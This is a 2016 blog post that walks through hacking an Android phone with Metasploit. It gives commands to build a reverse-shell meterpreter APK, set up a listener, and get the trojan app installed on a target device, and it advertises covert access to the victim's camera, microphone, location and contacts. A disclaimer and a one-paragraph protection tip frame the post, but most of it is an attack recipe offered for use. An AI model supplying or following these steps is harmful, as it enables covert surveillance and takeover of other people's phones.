Search This Blog

Sunday, July 10, 2016

How to Hack Android Phone – Metasploit and How to protect ourself

This  post will teach you how to Hack Android devices to Control Remotely.Nowdays every single person uses android device because its ease of use , multitasking , its features and functionality . lately android phone growing very fast worldwide. Here in China you can get android phone for only US$ 30 it’s one of the reason why android growing fast. Nothing is perfect and android phone is vulnerable too.Just think about , your android smartphone taking your pics using your phone camera even it is on sleep mode and you don’t know .There are soo many third party spy software’s in market but some of them are fake and some of them not works properly.But today i will show you how to hack android device remotely.
What actually we are doing:
In this tutorial, we are going to create a deploy application using Kali Linux Metasploit which should be installed on the target android device. When installed successfully, we can gain full access to that device.

After reading this article – Malicious Android adware campaign tries to exploit root access  ,i was really worried about innocent victims .I recommend you to take a look of this link and understand the hazards of third party malicious apps.

Please read disclaimer : I performed attacks using my own devices.This tutorial is for learning purposes only and should not be used for any illegal activities.It is punishable offence ,this post only teach you How Hackers gain unauthorized access from your device and you dont have any idea about that .So ,it’s only for awareness Don’t break someone privacy who not belongs to you , i’m not liable for any illegal activity…….


Prerequisites to Hack Android Phone – Metasploit :
  1. A PC or Laptop running on Linux Operating System .If you didn’t installed or you don’t know How to run kali Linux please goto my post How to install Kali Linux in virtual box or how to run linux live in virtual box( without installing ) .
  2. Active Internet Connection( It should be good connection not like dialup ).
  3. An Android device to exploit.
Features of this Android HACK :
  • Get contacts from remote android device.
  • Click snaps using front or back camera.
  • Get real-time pin point location.
  • Record real-time sound by using microphone of android device.
  • and lots more……..

Hacking Android Smartphone using Metasploit :

Step 1 : Open the terminal in Linux , type ” su ” (without quotes).
Step 2 : Type in terminal :
:~#    msfpayload -p android/meterpreter/reverse_tcp LHOST=youripaddress LPORT=XXXX R > malware.apk
Screenshot (475)
[ REPLACE YOURIPADDRESS WITH YOUR IP AND REPLACE XXXX WITH YOUR AS DESIRED PORT . YOU CAN CHANGE NAME OF YOUR MALICIOUS APK FILE BY REPLACING WITH ” MALWARE ” ]
If you don’t know your ip address, simply open another terminal and type “ ifconfig ” without quotes. You can see your ip address beside wlan0 it would be something like 192.168.x.x (Note: This will show you internal ip ( lan ip)  ).

Step 3 : Now goto the home folder.Find your newly
created deploy application malicious.apk will be automatically generated.
Screenshot (476)
 
Step 4 : Now open the listener type below codes in another terminal :

:~#   msfconsole
[ Now metasploit is loading it will take some time approx. 55 seconds. ]

Step 5 : When metasploit successfully loaded type the below code.


> use exploit/multi/handler 
> set payload android/meterpreter/reverse_tcp
> set LHOST 192.168.XXX.XXX (the same ip address you entered in step1).
> set LPORT XXXX (the same port you used in step1).
> exploit

Now the console starts listening to 192.168.xxx.xxx at port XXXX .
Step 5 : Now send the upgrade.apk from home folder to the target android device and Install it.

Step 6 : As soon as you open the app in the device, you can see the connected device in console terminal.
Screenshot (479)
Step 7  : Now you have full access to the device from the terminal. Just type ” help ” or ” ? and you will see list of  all the available commands.Screenshot (480)


[ Note : some of you got errors like starting to 0.0.0.0 at port 8080 something like this ,it means you are trying to use your dynamic ip ( your router is DHCP enabled ) ,and this tutorial will works only on your lan network.If you want to do this on any network (world wide)  , then just use your static ip instead of lan ip ,if you are confused how to know static ip then goto my previous post on static and dynamic ip ]

[ Note : Don’t hack any  device who not belongs to you,it is illegal.If you did this , im not responsible.stealing someone information without permission is crime .It’s for education purpose only. ]

How to save yourself form these type of Android hacks :

From this tutorial you may have understood how easy it is to hack android devices. So to protect your self from being hacked you should check the app thoroughly before installing it.Try to avoid unknown apps.check its publisher or developer.Install trusted developer apps only……

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo
Posted by Vishal S Sangwa at 7/10/2016 09:07:00 PM
Labels: ,
Subscribe to: Post Comments (Atom)